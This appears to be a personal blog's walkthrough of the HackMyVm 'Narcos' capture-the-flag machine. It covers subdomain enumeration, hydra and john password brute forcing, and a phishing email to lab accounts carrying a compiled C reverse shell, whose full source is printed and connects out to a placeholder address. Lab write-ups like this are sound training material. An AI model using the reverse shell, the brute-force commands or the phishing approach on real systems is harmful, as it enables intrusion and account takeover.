Windy's little blog

一切生活中的杂七杂八, and I like CTF.

HackMyVm Narcos Walkthrough

Another very interesting VM from HackMyVm, can be download here.


Nmap scan ports.

图片.png


At port 80, there is a static html page.  Bruteforce the folders and files.

图片.png


There is a squirrelmail site, but we can not login now.

图片.png


After stuck here for some time, we notice that the VM start screen has some hints.

图片.png


Add "escobar.hmv" to etc/hosts, and bruteforce the subdomains.

gobuster vhost -u http://escobar.hmv -w /apps/SecLists/Discovery/DNS/subdomains-top1million-110000.txt


We can get another subdomain, then add it to /etc/hosts too.

图片.png


Open the new address in browser, we get "File Browser" login panel.

图片.png


We search the internet, and find the project at github, and in doc page, we get the default credentials.

图片.png


Of cource, the password is not default. We need to bruteforce it with username "admin". Burpsuite to capture the post data of login panel, send to repeater, and click "send" once. Let's check the post data and response.

图片.png



Now we know, the post data is in json format, and the server reponse of fail is "Forbidden". Then we use hydra to bruteforce. Take care that the special character needs to be escaped(thanks @ch4rm for the help).

hydra -l admin -P /usr/share/wordlists/rockyou.txt management.escobar.hmv http-post-form '/api/login:{"username"\:"^USER^","password"\:"^PASS^","recaptcha"\:""}:Forbidden' -t 64 -f


Soon we get the correct password.

图片.png


Now we can log in the filebrowser. And there are two folders and one file.

图片.png


In folder "works", there is a logins.xlsx. The name is so interesting, we download it.

图片.png


When try to open it,  need password.

图片.png


We use john to brute force the password.

python2 /usr/share/john/office2john.py logins.xlsx > logins.hash
john --wordlist=/usr/share/wordlists/rockyou.txt logins.hash

图片.png


Now we can open the xlsx file. There are four email accounts inside the doc, three activated, one deactivated. One more subdomain address "http://elcorreo.escobar.hmx", we add it to /etc/hosts. And a message looks like some kind of hint.

图片.png


Because the gonzalo is webadmin, we try to log in the squirrelmail with his account. And succeed.

图片.png


Here comes a trap. Because the squirrelmail's version is 1.4.23, and google says it may have a RCE vulnerability. But after several times of test, at last I fail to get a reverse shell.

Then @ch4rm hint me, maybe I should consider email fishing. After I checked each email's content,  I decide to compose a email with subject "new update release", with the secret code in email body, and with a reverse shell in attachment named "update".  The email will send to the other two account from the xlsx file.


图片.png


The reverse shell code is downloaded from internet, and is coded in C.

/* credits to http://blog.techorganic.com/2015/01/04/pegasus-hacking-challenge/ */
#include <stdio.h>
#include <unistd.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#define REMOTE_ADDR "XXX.XXX.XXX.XXX"
#define REMOTE_PORT XXX
int main(int argc, char *argv[])
{
    struct sockaddr_in sa;
    int s;
    sa.sin_family = AF_INET;
    sa.sin_addr.s_addr = inet_addr(REMOTE_ADDR);
    sa.sin_port = htons(REMOTE_PORT);
    s = socket(AF_INET, SOCK_STREAM, 0);
    connect(s, (struct sockaddr *)&sa, sizeof(sa));
    dup2(s, 0);
    dup2(s, 1);
    dup2(s, 2);
    execve("/bin/sh", 0, 0);
    return 0;
}


Compile it.

图片.png


After sending the email, wait a few seconds, we get the reverse shell as user "carlos".  Now we have user flag.

图片.png


There are totally three users in home folder.  After some enum, I found we can su carlos and gonzalo with the password in the xlsx file, and both of the home folder of these two accounts are readable. Then focus is on user pablo, whose home folder is unreadable now.

If we su pablo with the password in xlsx file directly, we will get "no terminal error".

图片.png


We need to run the following two cmds to set a TERM variable. The numberof rows and columns depend on the size of your screen.

export TERM=xterm-256color
stty rows 120 columns 120

Then we run su pablo again, WOW, the screen is full of strange code like computer virus infection.

图片.png


After severl seconds, we get this hint screen.

图片.png


Look like we need to decrypt the sr* code. Hint says VINEGAR. Let's google it.

图片.png


Click the first site (should be most popular because CTFers likes it).  And after some failure,  I read the hints again carefully. I think, "aaaa-zzzz" means the alphabet set, and "pablo******" means the correct password starts with this string. That narrows our decryption results. At last, we can get the right one from more than 20 decrypted passwords.

图片.png


We enter the "real" password, then we log in as pablo.

图片.png


OK, now sudo -l, and with these two real passwords, we can do anything. Finally we are root.

图片.png


Thanks for reading till this end. So there is one more clue.

If you have tried to RCE the squirrelmail, with the POC code downloaded from internet, then you will fail to send emails.

图片.png


In fact, it's because the RCE code change the user's own email address. We need to change it back to original correct one.

图片.png

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Powered By Z-BlogPHP 1.7.0